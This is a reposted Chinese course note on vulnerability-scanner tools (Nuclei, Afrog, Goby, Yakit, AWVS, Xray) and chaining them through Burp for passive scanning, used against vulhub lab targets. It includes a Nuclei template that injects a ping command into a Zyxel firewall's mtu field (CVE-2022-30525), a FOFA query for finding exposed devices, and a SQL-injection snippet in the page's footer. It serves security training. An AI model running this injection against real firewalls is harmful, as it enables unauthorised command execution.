Day101:漏洞发现-漏扫项目篇NucleiYakitGobyAfrogXrayAwvs联动中转被动

目录

特征类-三方Poc调用&模版Poc调用

案例1:单点对某特征点进行安全评估

Goby-综合类

Nuclei-较综合类

Afrog-特征类

Yakit-可特征可综合

案例2:新型对某特征点进行安全评估

综合类-主动漏扫&中转联动&被动联动

案例1:单点工具主动对某站点进行安全评估

AWVS

Xray

案例2:联动对APP抓包进行安全评估

Burp&Xray联动-抓包给xray扫

Awvs&Xray联动-爬虫给xray扫

Awvs&Burp&Xray中转联动-都扫看流量

知识点:

1、综合类-Burp&Xray&Awvs&Goby

2、特征类-Afrog&Yakit&Nuclei

3、联动类-主动扫描&被动扫描&中转扫描

市面上有很多漏扫系统工具脚本,课程讲到的基本都是目前主流推荐的优秀项目!
Burpsuite,Awvs,Xray,Goby,Afrog,Yakit,Nuclei,Vulmap,Pocassist,Nessus,Pentestkit,Kunyu,Pocsuite3,浏览器各类插件,Burpsuite插件(HaE,ShiroScan,FastJsonScan,Log4j2Scan,Springscan,JScan等)。

BurpSuite是用于攻击web 应用程序的集成平台,包含了许多工具。BurpSuite为这些工具设计了许多接口,以加快攻击应用程序的过程。所有工具都共享一个请求,并能处理对应的HTTP 消息、持久性、认证、代理、日志、警报。

Acunetix一款商业的Web漏洞扫描程序,它可以检查Web应用程序中的漏洞,如SQL注入、跨站脚本攻击、身份验证页上的弱口令长度等。它拥有一个操作方便的图形用户界面,并且能够创建专业级的Web站点安全审核报告。新版本集成了漏洞管理功能来扩展企业全面管理、优先级和控制漏洞威胁的能力。

Xray是从长亭洞鉴核心引擎中提取出的社区版漏洞扫描神器,支持主动、被动多种扫描方式,自备盲打平台、可以灵活定义 POC,功能丰富,调用简单,支持Windows /macOS /Linux 多种操作系统,可以满足广大安全从业者的自动化 Web 漏洞探测需求。

Goby是一款新的网络安全测试工具,由赵武Zwell(Pangolin、JSky、FOFA作者)打造,它能够针对一个目标企业梳理最全的攻击面信息,同时能进行高效、实战化漏洞扫描,并快速的从一个验证入口点,切换到横向。能通过智能自动化方式,帮助安全入门者熟悉靶场攻防,帮助攻防服务者、渗透人员更快的拿下目标。

Nuclei是一款基于YAML语法模板的开发的定制化快速漏洞扫描器。它使用Go语言开发,具有很强的可配置性、可扩展性和易用性。 提供TCP、DNS、HTTP、FILE 等各类协议的扫描,通过强大且灵活的模板,可以使用Nuclei模拟各种安全检查。(注意:不同工具的yaml模板都不同,无法做到通用)

Afrog 是一款性能卓越、快速稳定、PoC 可定制的漏洞扫描(挖洞)工具,PoC 涉及 CVE、CNVD、默认口令、信息泄露、指纹识别、未授权访问、任意文件读取、命令执行等多种漏洞类型,帮助网络安全从业者快速验证并及时修复漏洞。

Yakit是一款集成化单兵安全能力平台,通过函数提供各类底层安全能力,包括端口扫描、指纹识别、poc框架、shell管理、MITM劫持、强大的插件系统等。旨在打造一个覆盖渗透测试全流程的网络安全工具库。
 

特征类-三方Poc调用&模版Poc调用

案例1:单点对某特征点进行安全评估

docker拉取靶场镜像:
docker run -it -p 8888:8080 vulhub/struts2:s2-053
docker run -it -p 8090:8090 vulhub/fastjson:1.2.45
docker run -it -p 8888:8080 vulhub/shiro:1.2.4

Goby-综合类

https://gobysec.net/

GUI界面,使用简单,直接有手就行

Nuclei-较综合类

官网地址:https://nuclei.projectdiscovery.io/

项目下载:https://github.com/projectdiscovery/nuclei

官方Nuclei-Templates&第三方Nuclei-Templates:

https://github.com/projectdiscovery/nuclei-templates

https://github.com/ExpLangcn/NucleiTP

扫描批量url

nucle -l urls.txt

扫描单个目标

nuclei -target xxx.com

加载对应的poc脚本,可以是当前路径下

nuclei -t ./test/
nuclei -t ./test/test.yaml

推荐使用,批量检测urls.txt,poc为test.yaml,输出结果result.txt

nuclei -l urls.txt -t test.yaml -o result.txt

Afrog-特征类

https://github.com/zan8in/afrog

Afrog是一款性能卓越、快速稳定、PoC可定制的漏洞扫描(挖洞)工具,PoC涉及CVE、CNVD、默认口令、信息泄露、指纹识别、未授权访问、任意文件读取、命令执行等多种漏洞类型,帮助网络安全从业者快速验证并及时修复漏洞。

扫描单个目标

afrog -t http://example.com -o result.html

扫描多个目标

afrog -T urls.txt -o result.html

测试单个PoC

afrog -t http://example.com -P ./testing/poc-test.yaml -o result.html

测试多个PoC

afrog -t http://example.com -P ./testing/ -o result.html

Yakit-可特征可综合

https://www.yaklang.com/

GUI界面,使用简单,直接有手就行

案例2:新型对某特征点进行安全评估

例子:CVE-2022-30525: Zyxel 防火墙远程命令注入漏洞
https://blog.csdn.net/weixin_43080961/article/details/124776553

复现:

Fofa:title=="USG FLEX 50 (USG20-VPN)"nuclei.exe -t Zyxel.yaml -l z.txt

Zyxel.yaml:

id: CVE-2022-30525
info:name: cxauthor: remoteseverity: hightags: CVE-2022-30525reference: CVE-2022-30525
requests:- raw:- |POST /ztp/cgi-bin/handler HTTP/1.1Host: {{Hostname}}Content-Type: application/json; charset=utf-8{"command": "setWanPortSt","proto": "dhcp","port": "1270","vlan_tagged": "1270","vlanid": "1270","mtu": "{{exploit}}","data":""}payloads:exploit:- ";ping -c 3 {{interactsh-url}};"attack: pitchforkmatchers:- type: wordpart: interactsh_protocolname: dnswords:- "dns"

综合类-主动漏扫&中转联动&被动联动

案例1:单点工具主动对某站点进行安全评估

http://testphp.vulnweb.com/

AWVS

Xray

.\xray_windows_amd64.exe webscan --basic-crawler http://xx/ --html-output xx.html

案例2:联动对APP抓包进行安全评估

eg:安卓模拟器某APP应用

.\xray_windows_amd64.exe webscan --listen 127.0.0.1:7777 --html-output xx.html

之后在模拟器上打开APP,bp就会收到相关数据包并转发给xray

对比工具优缺点

  • 爬虫:常规漏洞测试
  • Poc:用网上各种组件框架的漏洞去测试
  • Awvs:爬虫强,Poc国内差点
  • 任务添加&数据头部&代理模式&扫描模式等
  • Xray:爬虫弱,Poc国内友好

工具联动意义

  1. 相互联动性解决漏扫(APP、小程序等)
  2. 相互联动性解决URL未探针

Burp&Xray联动-抓包给xray扫

1、主-Burp设置转发代理

2、副-Xray设置被动扫描

.\xray_windows_amd64.exe webscan --listen 127.0.0.1:7777 --html-output xx.html

Awvs&Xray联动-爬虫给xray扫

1、主-Awvs设置代理扫描

2、副-Xray设置被动扫描

.\xray_windows_amd64.exe webscan --listen 127.0.0.1:7788 --html-output xx.html

Awvs&Burp&Xray中转联动-都扫看流量

1、主-Awvs设置代理扫描

2、中-Burp设置转发代理

3、副-Xray设置被动扫描

.\xray_windows_amd64.exe webscan --listen 127.0.0.1:7777 --html-output xx.html

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/817000.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

移动开发避坑指南——内存泄漏

移动开发避坑指南——内存泄漏

在日常编写代码时难免会遇到各种各样的问题和坑,这些问题可能会影响我们的开发效率和代码质量,因此我们需要不断总结和学习,以避免这些问题的出现。接下来我们将围绕移动开发中常见问题做出总结,以提高大家的开发质量。本系列文章…
阅读更多...
03-进程-网络命令-软件安装-SSH免密登录

03-进程-网络命令-软件安装-SSH免密登录

软件安装-网络命令-SSH免密登录 一 软件安装 1 在线安装 命令: yum 作用:yum会从指定的服务器自动下载rpm包并且进行安装,优点是可以自动处理依赖关系,并且一次安装所有的软件包。 配置yum的镜像源 yum源有个统一的下载服务…
阅读更多...
剖析 SPI 在 Spring 中的应用

剖析 SPI 在 Spring 中的应用

一、概述 SPI(Service Provider Interface),是Java内置的一种服务提供发现机制,可以用来提高框架的扩展性,主要用于框架的开发中,比如Dubbo,不同框架中实现略有差异,但核心机制相同…
阅读更多...
JavaScript中的cookie、localStorage的区别和特点

JavaScript中的cookie、localStorage的区别和特点

在JavaScript中,cookie和localStorage都是用于在客户端存储数据的方法,但它们有一些重要的区别和特点。 Cookie 特点: 存储量小:每个域名下的cookie数量是有限制的,并且每个cookie的大小也是有限制的。一般来说&…
阅读更多...
精确号码比例放通算法的设计与实现

精确号码比例放通算法的设计与实现

精确号码比例放通算法的设计与实现 引言背景问题定义算法设计1. 数据结构2. 算法流程3. 伪代码4. C语言实现 结论参考文献 引言 随着通信技术的飞速发展,呼叫中心和电信运营商面临着日益增长的呼叫管理需求。在某些情况下,为了确保服务质量或者遵守特定…
阅读更多...
LeetCode题练习与总结:加一--66

LeetCode题练习与总结:加一--66

一、题目描述 给定一个由 整数 组成的 非空 数组所表示的非负整数,在该数的基础上加一。 最高位数字存放在数组的首位, 数组中每个元素只存储单个数字。 你可以假设除了整数 0 之外,这个整数不会以零开头。 示例 1: 输入&…
阅读更多...
浏览器从输入url到渲染的过程

浏览器从输入url到渲染的过程

URL 解析: 当用户在浏览器地址栏输入 URL 时,浏览器会首先对 URL 进行解析。这个过程包括解析协议(如 HTTP、HTTPS)、域名、端口号和路径等信息。 DNS 解析: 把从输入的URL中解析出的域名发送给 DNS 服务器进行解析&a…
阅读更多...
方案分享 | 嵌入式指纹方案

方案分享 | 嵌入式指纹方案

随着智能设备的持续发展,指纹识别技术成为了现在智能终端市场和移动支付市场中占有率最高的生物识别技术。凭借高识别率、短耗时等优势,被广泛地运用在智能门锁、智能手机、智能家居等设备上。 我们推荐的品牌早已在2015年进入指纹识别应用领域&#xff…
阅读更多...
[dvwa] sql injection

[dvwa] sql injection

sql injection 0x01 low sql语句没有过滤 经典注入,通过逻辑or为真相当于select * from users where true,99换成1也成 用union select 对齐列数,查看数据库信息 1’ union select 1,2# order by探测对齐列数更方便 1’ or 11 order b…
阅读更多...
Python数据挖掘项目开发实战:处理作者归属问题

Python数据挖掘项目开发实战:处理作者归属问题

注意:本文下载的资源,与以下文章的思路有相同点,也有不同点,最终目标只是让读者从多维度去熟练掌握本知识点。 Python数据挖掘项目开发实战:处理作者归属问题 一、项目背景与目标 在出版、科研等领域,确定…
阅读更多...
05.MySQL索引事务

05.MySQL索引事务

1. 索引 1.1 概念 索引是一种特殊的文件,包含着对数据表里所有记录的引用指针。 可以对表中的一列或多列创建索引,并指定索引的类型,各类索引有各自的数据结构实现 1.2 作用 数据库中的表、数据、索引之间的关系,类似于书架上的…
阅读更多...
Spring AI 应用 - 智能记者

Spring AI 应用 - 智能记者

参考实现: https://github.com/mshumer/ai-journalist 上面是通过 Claude 配合 SERP 搜索 API,使用 Python 语言实现的,本文通过 GitHub Copilot 辅助改为了基于 Spring AI 的 Java 版本,本文使用的 OpenAI。 AIJournalist 实现…
阅读更多...
Tomcat源码解析——源码环境搭建

Tomcat源码解析——源码环境搭建

一、源码下载 在进行源码阅读前,先下载源码包,这样便于做笔记和debug。 我所用的版本是Tomcat7.0.68, Tomcat7.0.68下载地址:Index of /dist/tomcat/tomcat-7/v7.0.68/src 所有Tomcat的源码包下载地址:Index of /dist/…
阅读更多...
第6章:6.4.2 案例二:爬取成语网站数据 (MATLAB入门课程)

第6章:6.4.2 案例二:爬取成语网站数据 (MATLAB入门课程)

讲解视频:可以在bilibili搜索《MATLAB教程新手入门篇——数学建模清风主讲》。​ MATLAB教程新手入门篇(数学建模清风主讲,适合零基础同学观看)_哔哩哔哩_bilibili 本案例用到的网址为:成语大全列表成语大全列表https…
阅读更多...
FFmpeg:自实现ijkplayer播放器--11音视频同步

FFmpeg:自实现ijkplayer播放器--11音视频同步

文章目录 音视频同步时钟结构时间api实现过程音视频同步 音视频同步采用以音频为基准的方式,使用时间轴作为参考 如部分音频数据解不出来时,计算音频的pts(时间戳)与时间轴的差值,视频时间为差值加上时间轴,使得时间戳和音频一样 时间轴统是通过av_gettime_relative()获取…
阅读更多...
c语言如何理解指针的指针?

c语言如何理解指针的指针?

1.啥叫指针? 在C语言中,指针是一个非常重要的概念。指针本质上是一个变量,它的值不是数据本身,而是存储数据的内存地址。指针允许程序直接访问和操作内存中的数据,这在很多情况下非常有用,比如在处理数组、…
阅读更多...
NSA发布《在数据支柱中推进零信任成熟度》报告

NSA发布《在数据支柱中推进零信任成熟度》报告

4月9日,美国国家安全局(NSA)发布了题为《在数据支柱中推进零信任成熟度》的报告,旨在于数据安全层面提供指导,以增强数据整体安全性并保护静态和传输中的数据。(如下图) 一、主要内容 报告中的建议侧重于将…
阅读更多...
企业电子招标采购系统源码之从供应商管理到采购招投标、采购合同、采购执行的全过程数字化管理

企业电子招标采购系统源码之从供应商管理到采购招投标、采购合同、采购执行的全过程数字化管理

功能描述 1、门户管理:所有用户可在门户页面查看所有的公告信息及相关的通知信息。主要板块包含:招标公告、非招标公告、系统通知、政策法规。 2、立项管理:企业用户可对需要采购的项目进行立项申请,并提交审批,查看所…
阅读更多...
ChatGPT在线网页版

ChatGPT在线网页版

ChatGPT镜像 今天在知乎看到一个问题:“平民不参与内测的话没有账号还有机会使用ChatGPT吗?” 从去年GPT大火到现在,关于GPT的消息铺天盖地,真要有心想要去用,途径很多,别的不说,国内GPT的镜像…
阅读更多...
AcWing 897 最长公共子序列

AcWing 897 最长公共子序列

给定两个长度分别为 NN 和 MM 的字符串 AA 和 BB,求既是 AA 的子序列又是 BB 的子序列的字符串长度最长是多少。 输入格式 第一行包含两个整数 NN 和 MM。 第二行包含一个长度为 NN 的字符串,表示字符串 AA。 第三行包含一个长度为 MM 的字符串&…
阅读更多...
最新文章

Copyright @ 2022~2023